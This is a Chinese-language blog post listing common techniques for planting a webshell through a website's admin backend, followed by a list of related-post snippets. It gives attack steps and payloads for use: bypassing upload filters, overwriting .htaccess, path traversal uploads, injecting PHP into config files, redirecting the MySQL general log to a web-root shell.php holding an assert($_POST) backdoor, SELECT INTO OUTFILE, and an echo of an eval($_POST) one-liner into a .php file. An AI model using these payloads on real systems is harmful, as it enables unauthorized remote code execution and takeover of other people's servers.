后台getshell常用技巧
1.利用文件上传漏洞,找文件上传处想办法上传php文件。
一些网站在设置可以允许修改上传的文件类型则直接添加php
有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过
很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况
这种情况直接上传一个.hatccess文件覆盖这个,让其失效。
或者上传不重命名的话上传../../shell.php 传到其他不被限制访问的目录
或者找任意文件删除漏洞把.hatccess文件删除
2.找文件配置的地方写入php代码,一般都有过滤的,想办法绕过
过滤单引号的话可以用注释把上一个的内容注释掉 在下一个参数配置注入代码
效果如下
$conf_1 ='xx\';
$conf_2 = ';phpinfo();//'
这样就相当于
$conf_1 ='xx\';$conf_2 = ';
phpinfo();
php代码就可以执行了,防护比较弱的话直接访问这个配置文件就可以getshell了。
防护比较好禁止访问配置文件时,就找包含这个配置文件的文件即可。
3.找有没有存在任意文件包含的地方,本地包含的话直接上传php代码的图片,远程包含的话就在自己的服务器上设置php代码文件
4.sql注入getshell 要知道网站的绝对路径
方法一:利用设置mysql log为php文件,并设置路径到网站目录下,这样就可以把sql中执行的php语句插入的log中了
如:
SETglobal general_log='on';
SETglobalgeneral_log_file='D:/webshell/WWW/shell.php';#如果没有shell.php会自动创建
SELECT'<?php assert($_POST["cmd"]);?>';
方法二:
select "<?php phpinfo(); ?>" into outfile 'shell路径.php'
5.远程图片文件下载
有时候远程图片下载的时候,可以设置一下下载自己的php文件
如 自己服务器上的文件1.php
<?php
echo "<?php phpinfo(); ?>";
?>
或者别的方式,让页面有php代码,如果不过滤后缀的话直接会下载这个php文件
6.zip解压getshell
这个再系统升级或者插件安装的地方很多都有这个问题。上传shell.php在压缩包中,上传系统升级时会解压缩,那么就可以getshell
7.缓存写入
有些地方会把缓存写入到一个php文件里,想办法让自己的payload写入缓存中
8.数据库备份getshell
有些提供功能可以通过数据库备份进行修改文件后缀。
9.编辑模板getshell
在网站编辑模板插入一句话
10.命令执行拿webshell
echo <?php @eval($_POST(a));?> >路径.php
可以用相对路径也可以用绝对路径
11.编辑器漏洞getshell
要留意cms使用的编辑器版本是否是已知漏洞的版本
12.利用文件解析漏洞拿webshell
13.找可以执行代码的函数,看看参数是否可控
14.找写文件的函数,看看文件后缀和内容是否可控
15.没有进入后台
0day拿webshell
IIS写权限拿webshell(put一个shell进去)
命令执行拿webshell
通过注入漏洞拿webshell
前台图片上传拿webshell
Strusts2拿webshell
java反序列拿shell
后台getshell常用技巧相关推荐
- 后台getshell常用技巧总结
1.利用文件上传漏洞,找文件上传处想办法上传php文件. 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是 ...
- linux常用技巧(一):后台下载
linux常用技巧(一):后台下载 "java常见小错误"系列文章推荐: 上一篇:java小技巧(二):JAVA 交集,差集,并集 前文推荐:java常见小错误(一):变量类型自动 ...
- Linux Shell常用技巧(九) 系统运行进程
Linux Shell常用技巧(九) 系统运行进程 十九. 和系统运行进程相关的Shell命令: 1. 进程监控命令(ps): 要对进程进行监测和控制,首先必须要了解当 ...
- SemEval-2020自由文本关系抽取冠军方案解读 (附NLP竞赛常用技巧总结)
本文将回顾平安人寿近期在PaperWeekly × Biendata直播间进行的主题为「SemEval-2020自由文本关系抽取冠军方案解读(附NLP竞赛常用技巧总结)」的技术分享,由平安人寿AI团队 ...
- 直播 | SemEval-2020自由文本关系抽取冠军方案解读(附NLP竞赛常用技巧总结)
「PW Live」是由 PaperWeekly 和 biendata 共同发起的学术直播间,旨在帮助更多的青年学者宣传其最新科研成果.我们一直认为,单向地输出知识并不是一个最好的方式,而有效地反馈和交 ...
- iPhone不为人知的功能常用技巧,看完后才发现很多用iPhone的人实在是愧对乔布斯! - imsoft.cnblogs...
很多人花了四五千买部苹果,结果只用到四五百块钱的普通手机功能. iPhone不为人知的功能,常用技巧: 网上搜集整理的iPhone快捷键操作,虽然表面上iPhone按键只有一个HOME键,大部分操作都 ...
- ASP.NET的常用技巧等
网络日志 2006/10/17 ASP.NET的常用技巧(转) ASP.NET的常用技巧 Asp.Net细节性问题技巧精萃 1.Asp.Net中几种相似的标记符号: < %=...%>&l ...
- CSS入门六、常用技巧
零.文章目录 CSS入门六.常用技巧 1.精灵图 (1)为什么需要精灵图 一个网页中往往会应用很多小的背景图像作为修饰,当网页中的图像过多时,服务器就会频繁地接收和发送请求图片,造成服务器请求压力过大 ...
- div css 常用技巧
div css 常用技巧 1.给图片加上alt属性: <img src="logo.gif" alt="我的公司logo,点击返回首页" /> 2 ...
最新文章
- 7-24 约分最简分式 (C语言)
- 测试php连接mysql
- 3月Win 10美占有率超20% 免费升级是否延长受关注
- win10桌面计算机打不开,win10系统桌面图标打不开的解决技巧
- 数据挖掘基础知识-矩阵(分解)
- 算法入门经典第六章 例题6-8 树
- VS2013出现“无法找到“xxx.exe”的调试信息,或者调试信息不匹配”错误解决方案
- 从工具到平台|默安科技研发安全一体化管理平台正式发布
- 信息学奥赛一本通 1074:津津的储蓄计划 | 1835:【04NOIP提高组】津津的储蓄计划 | OpenJudge NOI 1.5 22
- 极限运动:街头极限单车,不只是牛逼!
- android:“新版飞机大战”源码开源啦!
- P2P技术原理及应用
- 十分钟读懂 黑客如何入侵Windows 操作系统
- DNF服务器搭建服务端架设教程
- 2020年证券从业资格考试《金融市场基础知识》真题汇编卷一
- Android控件之Button
- 阿里云数据库(hk)连接不上处理方法
- vue里面watch监听当前路由信息
- sim的准确识别技术
- win10/win1桌面图标锁定,防止桌面图标移动